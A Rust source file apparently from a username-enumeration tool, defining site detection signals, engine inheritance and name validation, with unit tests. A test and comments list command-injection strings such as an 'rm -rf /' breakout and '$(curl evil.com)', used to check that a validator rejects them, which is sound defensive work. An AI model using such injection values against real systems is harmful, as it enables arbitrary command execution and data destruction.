Skip to main content

adler_core/
site.rs

1//! Site definitions and the multi-signal detection model.
2//!
3//! A site is a target URL plus a list of [`Signal`]s. Each signal is an
4//! independent rule that, when triggered against a response, votes either
5//! for the account existing ([`SignalVerdict::Found`]) or not
6//! ([`SignalVerdict::NotFound`]). Non-triggering signals stay silent
7//! ([`SignalVerdict::Ambiguous`]).
8//!
9//! Aggregation is **negative-priority**: if any signal votes
10//! [`SignalVerdict::NotFound`] the verdict is [`MatchKind::NotFound`];
11//! otherwise if any votes [`SignalVerdict::Found`] it is
12//! [`MatchKind::Found`]; with no votes at all it is
13//! [`MatchKind::Uncertain`].
14//!
15//! A `NotFound` vote wins over a `Found` vote because negative signals are
16//! specific (an exact "user not found" message, a 404, a login redirect)
17//! while a bare `200 OK` is weak positive evidence. This matches how
18//! Sherlock-style detectors work: a site that always returns 200 and only
19//! differentiates via an error string is correctly read as `NotFound` when
20//! that string is present, even though the 200 also satisfies a
21//! `StatusFound` signal.
22
23use std::fmt;
24
25use serde::{Deserialize, Serialize};
26
27use crate::check::MatchKind;
28use crate::error::{Error, Result};
29use crate::username::Username;
30
31/// One site we can probe for the existence of an account.
32#[derive(Debug, Clone, Serialize, Deserialize)]
33pub struct Site {
34    /// Human-readable site name. Doubles as the stable filter key
35    /// (case-insensitive) used by CLI `--only` / `--exclude`.
36    pub name: String,
37    /// URL template containing a `{username}` placeholder.
38    pub url: UrlTemplate,
39    /// Ordered list of detection signals. Aggregated per the type-level docs.
40    /// Optional in source JSON when [`Site::engine`] is set — the engine's
41    /// signals are inherited at load time. After
42    /// [`crate::Registry`] resolution this vec is always non-empty (or the
43    /// site fails `validate`).
44    #[serde(default, skip_serializing_if = "Vec::is_empty")]
45    pub signals: Vec<Signal>,
46    /// One or more usernames known to exist on this site. Consumed by
47    /// `adler doctor` to verify the signal list still reports `Found`
48    /// for a real account. Accepts either a single string or an array
49    /// of strings in JSON; the doctor probes each in declaration order
50    /// and passes the present-check if **any** one of them resolves to
51    /// `Found`. Listing several is defensive — brand accounts or other
52    /// users that the site special-cases (e.g. Instagram's own
53    /// `instagram` account) shouldn't false-fail the whole site.
54    #[serde(default, skip_serializing_if = "Option::is_none")]
55    pub known_present: Option<KnownPresent>,
56    /// Username known to *not* exist on this site (optional). When omitted,
57    /// the doctor generates a random nonsense username instead.
58    #[serde(default, skip_serializing_if = "Option::is_none")]
59    pub known_absent: Option<String>,
60    /// Optional CSS-selector rules for pulling profile fields (name, bio,
61    /// avatar, …) out of a `Found` page. Only applied under `--enrich`.
62    #[serde(default, skip_serializing_if = "Vec::is_empty")]
63    pub extract: Vec<Extractor>,
64    /// Free-form classification tags for scanning a subset of the registry,
65    /// e.g. `"social"`, `"dev"`, `"region:ru"`. Matched by CLI `--tag`.
66    /// A site with no tags is universal (included unless a `--tag` filter
67    /// excludes it). Conventionally lowercase; `axis:value` is just a naming
68    /// convention, not enforced.
69    #[serde(default, skip_serializing_if = "Vec::is_empty")]
70    pub tags: Vec<String>,
71    /// Extra HTTP headers to send with the probe (e.g.
72    /// `{"X-IG-App-ID": "936619743392459"}` to unlock Instagram's
73    /// `web_profile_info` endpoint, or a custom `User-Agent`). Browser
74    /// backends apply them via `Network.setExtraHTTPHeaders` before
75    /// navigation; the raw-HTTP path doesn't read this yet.
76    #[serde(default, skip_serializing_if = "std::collections::BTreeMap::is_empty")]
77    pub request_headers: std::collections::BTreeMap<String, String>,
78    /// Optional regular expression describing usernames a site will
79    /// accept. When set and the scanned username doesn't match, the
80    /// site is skipped (the outcome is reported as `Uncertain` with
81    /// reason `UsernameNotAllowed`, without issuing any HTTP request).
82    /// Saves work AND avoids the false-positive class where a site
83    /// 404s on illegal usernames in ways our signal can't tell apart
84    /// from a missing account.
85    ///
86    /// Imported from Sherlock's `regexCheck` field; 95+ sites
87    /// upstream carry one (length bounds, character classes, etc.).
88    /// Validation at load time compiles the regex with `regex::Regex`
89    /// — a malformed pattern rejects the site rather than silently
90    /// degrading at scan time.
91    #[serde(default, skip_serializing_if = "Option::is_none")]
92    pub regex_check: Option<String>,
93    /// Name of a shared [`Engine`] this site inherits from (e.g.
94    /// `"Discourse"`, `"vBulletin"`). Forum-software platforms host
95    /// thousands of instances with identical detection signatures;
96    /// defining the signature once on an engine and inheriting it
97    /// keeps the registry small and the cost of a platform-wide
98    /// HTML change one fix instead of hundreds.
99    ///
100    /// At [`crate::Registry::validate`] time, engine fields are
101    /// merged *under* the site's own — anything the site declares
102    /// explicitly (`signals`, `request_headers`, `regex_check`) wins on
103    /// conflict; anything left empty / unset is filled from the
104    /// engine. An `engine: "X"` referring to a non-existent X is a
105    /// load-time error.
106    #[serde(default, skip_serializing_if = "Option::is_none")]
107    pub engine: Option<String>,
108}
109
110/// Shared detection signature template for a family of sites that
111/// run the same forum / blog / wiki software (Discourse, vBulletin,
112/// `XenForo`, `MediaWiki`, …). Referenced from [`Site::engine`].
113///
114/// Engines carry the same kinds of fields as a [`Site`] does (just
115/// the inheritable ones — there's no per-engine `url`, that comes
116/// from the site itself). At registry load, the engine's fields
117/// are merged *under* each referring site's own fields: site wins
118/// on conflict.
119#[derive(Debug, Clone, Default, Serialize, Deserialize)]
120#[non_exhaustive]
121pub struct Engine {
122    /// Default detection signals for sites of this family.
123    /// Inherited only when the site itself declares no `signals`.
124    #[serde(default, skip_serializing_if = "Vec::is_empty")]
125    pub signals: Vec<Signal>,
126    /// Default extra HTTP headers (e.g. a User-Agent that the
127    /// platform accepts where the browser default gets blocked).
128    /// Merged with the site's own headers; site wins per-key.
129    #[serde(default, skip_serializing_if = "std::collections::BTreeMap::is_empty")]
130    pub request_headers: std::collections::BTreeMap<String, String>,
131    /// Default username-validity regex inherited only when the site
132    /// itself doesn't declare one.
133    #[serde(default, skip_serializing_if = "Option::is_none")]
134    pub regex_check: Option<String>,
135}
136
137impl Engine {
138    /// Compile-check the engine's own constraints — the inheritable
139    /// fields are subject to the same validation as a site's would
140    /// be.
141    ///
142    /// # Errors
143    /// Returns [`Error::InvalidSite`] when the engine name is
144    /// empty, a signal carries an empty marker, or any other
145    /// constraint a [`Site::validate`] would also flag.
146    pub fn validate(&self, name: &str) -> Result<()> {
147        if name.trim().is_empty() {
148            return Err(Error::InvalidSite {
149                reason: "engine name is empty".into(),
150            });
151        }
152        for signal in &self.signals {
153            signal.validate().map_err(|reason| Error::InvalidSite {
154                reason: format!("engine {name:?}: {reason}"),
155            })?;
156        }
157        if let Some(pat) = &self.regex_check {
158            if let Err(err) = regex::Regex::new(pat) {
159                tracing::warn!(
160                    engine = %name, pattern = %pat, error = %err,
161                    "engine regex_check did not compile; gate disabled for inheriting sites",
162                );
163            }
164        }
165        Ok(())
166    }
167
168    /// Fill the inheritable empty / unset fields of `site` from
169    /// this engine. Site fields are authoritative: if the site has
170    /// any signals at all, no engine signals are merged in.
171    /// `request_headers` merge per-key (site wins on per-key
172    /// conflict).
173    pub fn merge_into(&self, site: &mut Site) {
174        if site.signals.is_empty() {
175            site.signals.clone_from(&self.signals);
176        }
177        for (k, v) in &self.request_headers {
178            site.request_headers
179                .entry(k.clone())
180                .or_insert_with(|| v.clone());
181        }
182        if site.regex_check.is_none() {
183            site.regex_check.clone_from(&self.regex_check);
184        }
185    }
186}
187
188/// Known-present declaration on a [`Site`].
189///
190/// In JSON this is `untagged`: a plain string `"torvalds"` deserialises
191/// into [`KnownPresent::Single`], an array `["torvalds", "leomessi"]`
192/// into [`KnownPresent::Multiple`]. Serialisation preserves the form
193/// the site was authored with, so single-username entries stay
194/// compact.
195#[derive(Debug, Clone, Serialize, Deserialize)]
196#[serde(untagged)]
197#[non_exhaustive]
198pub enum KnownPresent {
199    /// Exactly one candidate username.
200    Single(String),
201    /// Two or more candidate usernames. Doctor passes if any resolve
202    /// to `Found`.
203    Multiple(Vec<String>),
204}
205
206impl KnownPresent {
207    /// View all candidate usernames as a slice, in declaration order.
208    /// Always non-empty for `Single`; may be empty for a hand-authored
209    /// `Multiple([])` (validation rejects that).
210    pub fn as_slice(&self) -> &[String] {
211        match self {
212            Self::Single(s) => std::slice::from_ref(s),
213            Self::Multiple(v) => v.as_slice(),
214        }
215    }
216
217    /// Primary candidate — the first declared username. `Single`
218    /// always has one; `Multiple` may be empty if a contributor wrote
219    /// `[]` (caught by [`Site::validate`]).
220    pub fn primary(&self) -> Option<&str> {
221        self.as_slice().first().map(String::as_str)
222    }
223}
224
225impl From<&str> for KnownPresent {
226    fn from(s: &str) -> Self {
227        Self::Single(s.to_owned())
228    }
229}
230
231impl From<String> for KnownPresent {
232    fn from(s: String) -> Self {
233        Self::Single(s)
234    }
235}
236
237/// Upper bound on a site name's length. Names appear in CLI output,
238/// CSV columns, and the validate-sites.yml workflow's run-summary
239/// table — keeping them short avoids both UI breakage and
240/// pathological CI artefacts.
241const NAME_MAX_LEN: usize = 80;
242
243/// True when `name` consists only of characters safe to interpolate
244/// into shell, CSV, and CLI argument contexts. Matches the JSON
245/// Schema pattern `^[\w][\w .()!/+-]*$`.
246fn is_safe_site_name(name: &str) -> bool {
247    let mut chars = name.chars();
248    match chars.next() {
249        Some(c) if c.is_ascii_alphanumeric() || c == '_' => {}
250        _ => return false,
251    }
252    chars.all(|c| {
253        c.is_ascii_alphanumeric()
254            || c == '_'
255            || c == ' '
256            || matches!(c, '.' | '(' | ')' | '!' | '/' | '+' | '-')
257    })
258}
259
260/// A rule for extracting one profile field from a page.
261#[derive(Debug, Clone, Serialize, Deserialize)]
262pub struct Extractor {
263    /// Output field name, e.g. `"avatar"`, `"bio"`, `"name"`.
264    pub field: String,
265    /// CSS selector locating the element.
266    pub selector: String,
267    /// Attribute to read (e.g. `"src"`, `"content"`). When omitted, the
268    /// element's trimmed text content is used.
269    #[serde(default, skip_serializing_if = "Option::is_none")]
270    pub attr: Option<String>,
271}
272
273impl Site {
274    /// Render the site URL for a given username.
275    pub fn url_for(&self, username: &Username) -> String {
276        self.url.substitute(username.as_str())
277    }
278
279    /// Validate semantic invariants the type system can't enforce
280    /// (empty signals list, empty markers, empty status code sets).
281    pub fn validate(&self) -> Result<()> {
282        if self.name.trim().is_empty() {
283            return Err(Error::InvalidSite {
284                reason: "site name is empty".into(),
285            });
286        }
287        // Site names doubled as shell-interpolation values in the
288        // `validate-sites.yml` PR gate; an unsanitised name like
289        // `Foo"; rm -rf /; #` would have broken out of `"$name"`
290        // quoting and run arbitrary commands on the runner. Both the
291        // JSON Schema and this Rust loader enforce a safe character
292        // class (word chars plus a few visual punctuation marks) at
293        // every entry point.
294        if self.name.len() > NAME_MAX_LEN {
295            return Err(Error::InvalidSite {
296                reason: format!(
297                    "site name longer than {NAME_MAX_LEN} chars: {:?}",
298                    self.name
299                ),
300            });
301        }
302        if !is_safe_site_name(&self.name) {
303            return Err(Error::InvalidSite {
304                reason: format!(
305                    "site name {:?} contains characters outside the allowed \
306                     set (word chars, space, `.()!/+-`)",
307                    self.name
308                ),
309            });
310        }
311        if self.signals.is_empty() {
312            return Err(Error::InvalidSite {
313                reason: format!("site {:?}: signals list is empty", self.name),
314            });
315        }
316        for signal in &self.signals {
317            signal.validate().map_err(|reason| Error::InvalidSite {
318                reason: format!("site {:?}: {reason}", self.name),
319            })?;
320        }
321        for extractor in &self.extract {
322            if extractor.field.trim().is_empty() {
323                return Err(Error::InvalidSite {
324                    reason: format!("site {:?}: extractor has an empty field name", self.name),
325                });
326            }
327            if scraper::Selector::parse(&extractor.selector).is_err() {
328                return Err(Error::InvalidSite {
329                    reason: format!(
330                        "site {:?}: invalid CSS selector {:?} for field {:?}",
331                        self.name, extractor.selector, extractor.field
332                    ),
333                });
334            }
335        }
336        if let Some(pat) = &self.regex_check {
337            if let Err(err) = regex::Regex::new(pat) {
338                // Sherlock's regexes occasionally use lookarounds
339                // (e.g. `(?![.-])`), which the Rust `regex` crate
340                // doesn't support — it's a true regular-language
341                // engine for performance + DoS safety. Rather than
342                // reject the whole site over a username-gate the
343                // probe path will simply skip, downgrade to a warn
344                // and let the site keep working at the cost of one
345                // wasted probe per illegal username.
346                tracing::warn!(
347                    site = %self.name, pattern = %pat, error = %err,
348                    "regex_check did not compile; username-gate disabled for this site",
349                );
350            }
351        }
352        if let Some(kp) = &self.known_present {
353            if kp.as_slice().is_empty() {
354                return Err(Error::InvalidSite {
355                    reason: format!("site {:?}: known_present is an empty list", self.name),
356                });
357            }
358            for name in kp.as_slice() {
359                if name.trim().is_empty() {
360                    return Err(Error::InvalidSite {
361                        reason: format!(
362                            "site {:?}: known_present contains an empty username",
363                            self.name
364                        ),
365                    });
366                }
367            }
368        }
369        for tag in &self.tags {
370            if tag.trim().is_empty() {
371                return Err(Error::InvalidSite {
372                    reason: format!("site {:?}: tag is empty", self.name),
373                });
374            }
375        }
376        Ok(())
377    }
378}
379
380/// URL template containing a `{username}` placeholder.
381///
382/// Validated at construction: must contain the placeholder and start with
383/// `http://` or `https://`.
384#[derive(Debug, Clone, PartialEq, Eq)]
385pub struct UrlTemplate(String);
386
387const PLACEHOLDER: &str = "{username}";
388
389impl UrlTemplate {
390    /// Build a template, validating placeholder and scheme.
391    pub fn new(template: impl Into<String>) -> Result<Self> {
392        let t = template.into();
393        if !t.contains(PLACEHOLDER) {
394            return Err(Error::InvalidSite {
395                reason: format!("url template missing {PLACEHOLDER} placeholder: {t:?}"),
396            });
397        }
398        if !(t.starts_with("http://") || t.starts_with("https://")) {
399            return Err(Error::InvalidSite {
400                reason: format!("url template must start with http(s)://: {t:?}"),
401            });
402        }
403        Ok(Self(t))
404    }
405
406    fn substitute(&self, username: &str) -> String {
407        self.0.replace(PLACEHOLDER, username)
408    }
409
410    /// Borrow the raw template (with placeholder).
411    pub fn as_str(&self) -> &str {
412        &self.0
413    }
414}
415
416impl fmt::Display for UrlTemplate {
417    fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result {
418        f.write_str(&self.0)
419    }
420}
421
422impl Serialize for UrlTemplate {
423    fn serialize<S: serde::Serializer>(&self, s: S) -> std::result::Result<S::Ok, S::Error> {
424        self.0.serialize(s)
425    }
426}
427
428impl<'de> Deserialize<'de> for UrlTemplate {
429    fn deserialize<D: serde::Deserializer<'de>>(d: D) -> std::result::Result<Self, D::Error> {
430        let raw = String::deserialize(d)?;
431        Self::new(raw).map_err(serde::de::Error::custom)
432    }
433}
434
435/// A single piece of evidence about whether an account exists.
436///
437/// Signals are tagged in JSON by their `kind`. New variants will land for
438/// Phase 2 length-baseline scoring; the enum is `#[non_exhaustive]` so
439/// adding variants is not a breaking change.
440#[derive(Debug, Clone, Serialize, Deserialize)]
441#[serde(tag = "kind", rename_all = "snake_case")]
442#[non_exhaustive]
443pub enum Signal {
444    /// Votes **`Found`** when the response status is in `codes`.
445    StatusFound {
446        /// Status codes that vote for existence. Must be non-empty.
447        codes: Vec<u16>,
448    },
449    /// Votes **`NotFound`** when the response status is in `codes`.
450    StatusNotFound {
451        /// Status codes that vote for non-existence. Must be non-empty.
452        codes: Vec<u16>,
453    },
454    /// Votes **`Found`** when the response body contains `text`.
455    BodyPresent {
456        /// Substring whose appearance votes for existence. Must be non-empty.
457        text: String,
458    },
459    /// Votes **`NotFound`** when the response body contains `text`.
460    BodyAbsent {
461        /// Substring whose appearance votes for non-existence (e.g.
462        /// `"Profile not found"`). Must be non-empty.
463        text: String,
464    },
465    /// Votes **`NotFound`** when the final URL (post-redirect) contains
466    /// `fragment`.
467    RedirectAbsent {
468        /// Substring that, when present in the final URL, indicates the
469        /// account is missing (typically `"/login"` or `"/404"`). Must be
470        /// non-empty.
471        fragment: String,
472    },
473}
474
475/// Probe data extracted from an HTTP response, fed to each [`Signal`].
476///
477/// Internal detection plumbing — not part of the public API.
478#[derive(Debug)]
479pub(crate) struct Probe<'a> {
480    /// HTTP status code.
481    pub(crate) status: u16,
482    /// Final URL after redirects.
483    pub(crate) final_url: &'a str,
484    /// Decoded response body. Empty string when no body-using signal is configured.
485    pub(crate) body: &'a str,
486}
487
488/// What one signal concluded after looking at a probe.
489#[derive(Debug, Clone, Copy, PartialEq, Eq)]
490pub(crate) enum SignalVerdict {
491    /// This signal votes that the account exists.
492    Found,
493    /// This signal votes that the account does not exist.
494    NotFound,
495    /// This signal had nothing to say (its trigger condition didn't match).
496    Ambiguous,
497}
498
499impl Signal {
500    /// True if this signal needs to inspect the response body. Used by the
501    /// client to skip body reads when no signal requires them.
502    pub(crate) fn needs_body(&self) -> bool {
503        matches!(self, Self::BodyPresent { .. } | Self::BodyAbsent { .. })
504    }
505
506    /// Evaluate this signal against a probe and produce a vote.
507    pub(crate) fn evaluate(&self, probe: &Probe<'_>) -> SignalVerdict {
508        match self {
509            Self::StatusFound { codes } => {
510                if codes.contains(&probe.status) {
511                    SignalVerdict::Found
512                } else {
513                    SignalVerdict::Ambiguous
514                }
515            }
516            Self::StatusNotFound { codes } => {
517                if codes.contains(&probe.status) {
518                    SignalVerdict::NotFound
519                } else {
520                    SignalVerdict::Ambiguous
521                }
522            }
523            Self::BodyPresent { text } => {
524                if probe.body.contains(text.as_str()) {
525                    SignalVerdict::Found
526                } else {
527                    SignalVerdict::Ambiguous
528                }
529            }
530            Self::BodyAbsent { text } => {
531                if probe.body.contains(text.as_str()) {
532                    SignalVerdict::NotFound
533                } else {
534                    SignalVerdict::Ambiguous
535                }
536            }
537            Self::RedirectAbsent { fragment } => {
538                if probe.final_url.contains(fragment.as_str()) {
539                    SignalVerdict::NotFound
540                } else {
541                    SignalVerdict::Ambiguous
542                }
543            }
544        }
545    }
546
547    /// Human-readable description of why this signal fired against `probe`,
548    /// for verdict explainability. Only meaningful for a signal that voted
549    /// (i.e. didn't return [`SignalVerdict::Ambiguous`]); the caller filters.
550    pub(crate) fn describe_match(&self, probe: &Probe<'_>) -> String {
551        match self {
552            Self::StatusFound { .. } => format!("HTTP {} (status_found)", probe.status),
553            Self::StatusNotFound { .. } => format!("HTTP {} (status_not_found)", probe.status),
554            Self::BodyPresent { text } => format!("body contains {text:?} (body_present)"),
555            Self::BodyAbsent { text } => format!("body contains {text:?} (body_absent)"),
556            Self::RedirectAbsent { fragment } => {
557                format!("final URL contains {fragment:?} (redirect_absent)")
558            }
559        }
560    }
561
562    fn validate(&self) -> std::result::Result<(), String> {
563        match self {
564            Self::StatusFound { codes } | Self::StatusNotFound { codes } => {
565                if codes.is_empty() {
566                    return Err("status signal codes list is empty".into());
567                }
568            }
569            Self::BodyPresent { text } | Self::BodyAbsent { text } => {
570                if text.is_empty() {
571                    return Err("body signal text is empty".into());
572                }
573            }
574            Self::RedirectAbsent { fragment } => {
575                if fragment.is_empty() {
576                    return Err("redirect signal fragment is empty".into());
577                }
578            }
579        }
580        Ok(())
581    }
582}
583
584/// Aggregate per-signal verdicts into a final [`MatchKind`].
585///
586/// Negative-priority counting: any `NotFound` vote → `NotFound`; otherwise
587/// any `Found` vote → `Found`; no votes at all → `Uncertain`. See the module
588/// docs for why a `NotFound` vote outranks a `Found` vote.
589pub(crate) fn aggregate<I>(verdicts: I) -> MatchKind
590where
591    I: IntoIterator<Item = SignalVerdict>,
592{
593    let mut found = false;
594    let mut not_found = false;
595    for v in verdicts {
596        match v {
597            SignalVerdict::Found => found = true,
598            SignalVerdict::NotFound => not_found = true,
599            SignalVerdict::Ambiguous => {}
600        }
601    }
602    if not_found {
603        MatchKind::NotFound
604    } else if found {
605        MatchKind::Found
606    } else {
607        MatchKind::Uncertain
608    }
609}
610
611#[cfg(test)]
612mod tests {
613    use super::*;
614
615    fn site_with(signals: Vec<Signal>) -> Site {
616        Site {
617            name: "Example".into(),
618            url: UrlTemplate::new("https://example.com/{username}").unwrap(),
619            signals,
620            known_present: None,
621            known_absent: None,
622            extract: Vec::new(),
623            tags: Vec::new(),
624            request_headers: std::collections::BTreeMap::new(),
625            regex_check: None,
626            engine: None,
627        }
628    }
629
630    #[test]
631    fn url_template_substitutes_placeholder() {
632        let user = Username::new("alice").unwrap();
633        let site = site_with(vec![Signal::StatusFound { codes: vec![200] }]);
634        assert_eq!(site.url_for(&user), "https://example.com/alice");
635    }
636
637    #[test]
638    fn url_template_rejects_missing_placeholder() {
639        assert!(UrlTemplate::new("https://example.com/users/").is_err());
640    }
641
642    #[test]
643    fn url_template_rejects_bad_scheme() {
644        assert!(UrlTemplate::new("ftp://example.com/{username}").is_err());
645    }
646
647    #[test]
648    fn validate_requires_non_empty_signals() {
649        let err = site_with(vec![]).validate().unwrap_err();
650        assert!(err.to_string().contains("signals list is empty"));
651    }
652
653    #[test]
654    fn validate_rejects_empty_status_codes() {
655        let err = site_with(vec![Signal::StatusFound { codes: vec![] }])
656            .validate()
657            .unwrap_err();
658        assert!(err.to_string().contains("status signal"));
659    }
660
661    #[test]
662    fn validate_rejects_empty_body_text() {
663        let err = site_with(vec![Signal::BodyAbsent {
664            text: String::new(),
665        }])
666        .validate()
667        .unwrap_err();
668        assert!(err.to_string().contains("body signal"));
669    }
670
671    #[test]
672    fn validate_rejects_empty_redirect_fragment() {
673        let err = site_with(vec![Signal::RedirectAbsent {
674            fragment: String::new(),
675        }])
676        .validate()
677        .unwrap_err();
678        assert!(err.to_string().contains("redirect signal"));
679    }
680
681    #[test]
682    fn validate_rejects_shell_metacharacters_in_name() {
683        // The validate-sites.yml workflow used to inject `--only "$name"`
684        // where `$name` came from PR-controlled sites.json. A name like
685        // `Foo"; rm -rf /; #` would have broken out of `"..."` quoting
686        // and executed on the runner. Schema + this loader both enforce
687        // a safe character class; verify a representative selection of
688        // dangerous chars is rejected.
689        for bad in [
690            "Foo\"; rm -rf /; #",
691            "Bar$(curl evil.com)",
692            "Baz`whoami`",
693            "Qux\\nfoo",
694            "back\\slash",
695            "pipe|ish",
696            "semi;colon",
697            "amp&and",
698            "lt<gt>",
699        ] {
700            let mut s = site_with(vec![Signal::StatusFound { codes: vec![200] }]);
701            s.name = bad.into();
702            let err = s.validate().unwrap_err();
703            assert!(
704                err.to_string()
705                    .contains("characters outside the allowed set"),
706                "expected unsafe-name rejection for {bad:?}, got {err}",
707            );
708        }
709    }
710
711    #[test]
712    fn validate_accepts_real_world_site_names() {
713        // Cross-check the validation against names we actually ship.
714        for ok in [
715            "GitHub",
716            "Steam Community (User)",
717            "X / Twitter",
718            "osu!",
719            "Eintracht Frankfurt Forum",
720            "Archive of Our Own",
721            "Career.habr",
722            "fl",
723            "GitLab.com",
724            "Sbazar.cz",
725        ] {
726            let mut s = site_with(vec![Signal::StatusFound { codes: vec![200] }]);
727            s.name = ok.into();
728            assert!(s.validate().is_ok(), "expected {ok:?} to validate");
729        }
730    }
731
732    #[test]
733    fn validate_rejects_overlong_name() {
734        let mut s = site_with(vec![Signal::StatusFound { codes: vec![200] }]);
735        s.name = "A".repeat(100);
736        let err = s.validate().unwrap_err();
737        assert!(err.to_string().contains("longer than"));
738    }
739
740    #[test]
741    fn validate_accepts_well_formed_regex_check() {
742        let mut s = site_with(vec![Signal::StatusFound { codes: vec![200] }]);
743        s.regex_check = Some("^[a-zA-Z0-9_-]{3,40}$".into());
744        assert!(s.validate().is_ok());
745    }
746
747    #[test]
748    fn validate_tolerates_unsupported_regex_features() {
749        // Sherlock-imported regexes occasionally use lookarounds
750        // (e.g. `(?!...)`) that Rust's `regex` crate can't compile —
751        // those sites should still load, with the username-gate
752        // silently disabled rather than rejecting the whole site.
753        let mut s = site_with(vec![Signal::StatusFound { codes: vec![200] }]);
754        s.regex_check = Some("^(?![.-])[a-zA-Z0-9_.-]{3,20}$".into());
755        assert!(
756            s.validate().is_ok(),
757            "lookaround-bearing regex should warn, not reject the site"
758        );
759    }
760
761    #[test]
762    fn signal_status_found_votes_only_on_match() {
763        let signal = Signal::StatusFound { codes: vec![200] };
764        let probe = Probe {
765            status: 200,
766            final_url: "https://example.com/alice",
767            body: "",
768        };
769        assert_eq!(signal.evaluate(&probe), SignalVerdict::Found);
770        let probe = Probe {
771            status: 404,
772            ..probe
773        };
774        assert_eq!(signal.evaluate(&probe), SignalVerdict::Ambiguous);
775    }
776
777    #[test]
778    fn signal_status_not_found_votes_only_on_match() {
779        let signal = Signal::StatusNotFound { codes: vec![404] };
780        let probe = Probe {
781            status: 404,
782            final_url: "",
783            body: "",
784        };
785        assert_eq!(signal.evaluate(&probe), SignalVerdict::NotFound);
786        let probe = Probe {
787            status: 200,
788            ..probe
789        };
790        assert_eq!(signal.evaluate(&probe), SignalVerdict::Ambiguous);
791    }
792
793    #[test]
794    fn signal_body_absent_votes_not_found_when_text_present() {
795        let signal = Signal::BodyAbsent {
796            text: "Profile not found".into(),
797        };
798        let probe = Probe {
799            status: 200,
800            final_url: "",
801            body: "<h1>Profile not found</h1>",
802        };
803        assert_eq!(signal.evaluate(&probe), SignalVerdict::NotFound);
804        let probe = Probe {
805            body: "<h1>Welcome alice</h1>",
806            ..probe
807        };
808        assert_eq!(signal.evaluate(&probe), SignalVerdict::Ambiguous);
809    }
810
811    #[test]
812    fn signal_redirect_absent_inspects_final_url() {
813        let signal = Signal::RedirectAbsent {
814            fragment: "/login".into(),
815        };
816        let probe = Probe {
817            status: 200,
818            final_url: "https://example.com/login?next=/alice",
819            body: "",
820        };
821        assert_eq!(signal.evaluate(&probe), SignalVerdict::NotFound);
822        let probe = Probe {
823            final_url: "https://example.com/alice",
824            ..probe
825        };
826        assert_eq!(signal.evaluate(&probe), SignalVerdict::Ambiguous);
827    }
828
829    #[test]
830    fn aggregate_found_when_only_found_signals_fire() {
831        let kind = aggregate([SignalVerdict::Found, SignalVerdict::Ambiguous]);
832        assert_eq!(kind, MatchKind::Found);
833    }
834
835    #[test]
836    fn aggregate_not_found_when_only_not_found_signals_fire() {
837        let kind = aggregate([SignalVerdict::NotFound, SignalVerdict::Ambiguous]);
838        assert_eq!(kind, MatchKind::NotFound);
839    }
840
841    #[test]
842    fn aggregate_not_found_wins_over_found() {
843        // Negative-priority: a NotFound vote outranks a Found vote.
844        let kind = aggregate([SignalVerdict::Found, SignalVerdict::NotFound]);
845        assert_eq!(kind, MatchKind::NotFound);
846    }
847
848    #[test]
849    fn aggregate_uncertain_when_no_signals_fire() {
850        let kind = aggregate([SignalVerdict::Ambiguous, SignalVerdict::Ambiguous]);
851        assert_eq!(kind, MatchKind::Uncertain);
852    }
853
854    #[test]
855    fn aggregate_empty_is_uncertain() {
856        let kind = aggregate(std::iter::empty());
857        assert_eq!(kind, MatchKind::Uncertain);
858    }
859
860    #[test]
861    fn needs_body_is_true_only_for_body_signals() {
862        assert!(!Signal::StatusFound { codes: vec![200] }.needs_body());
863        assert!(!Signal::StatusNotFound { codes: vec![404] }.needs_body());
864        assert!(
865            !Signal::RedirectAbsent {
866                fragment: "/login".into()
867            }
868            .needs_body()
869        );
870        assert!(Signal::BodyPresent { text: "x".into() }.needs_body());
871        assert!(Signal::BodyAbsent { text: "x".into() }.needs_body());
872    }
873
874    #[test]
875    fn deserializes_signal_list() {
876        let json = r#"{
877            "name": "GitHub",
878            "url": "https://github.com/{username}",
879            "signals": [
880                { "kind": "status_found", "codes": [200] },
881                { "kind": "status_not_found", "codes": [404] }
882            ]
883        }"#;
884        let site: Site = serde_json::from_str(json).unwrap();
885        assert_eq!(site.name, "GitHub");
886        assert_eq!(site.signals.len(), 2);
887        site.validate().unwrap();
888    }
889
890    proptest::proptest! {
891        /// For any mix of per-signal verdicts, aggregation obeys the
892        /// negative-priority spec: any NotFound wins; else any Found; else
893        /// Uncertain.
894        #[test]
895        fn aggregate_matches_negative_priority_spec(
896            votes in proptest::collection::vec(
897                proptest::prop_oneof![
898                    proptest::strategy::Just(SignalVerdict::Found),
899                    proptest::strategy::Just(SignalVerdict::NotFound),
900                    proptest::strategy::Just(SignalVerdict::Ambiguous),
901                ],
902                0..16,
903            ),
904        ) {
905            let kind = aggregate(votes.iter().copied());
906            let expected = if votes.contains(&SignalVerdict::NotFound) {
907                MatchKind::NotFound
908            } else if votes.contains(&SignalVerdict::Found) {
909                MatchKind::Found
910            } else {
911                MatchKind::Uncertain
912            };
913            proptest::prop_assert_eq!(kind, expected);
914        }
915    }
916}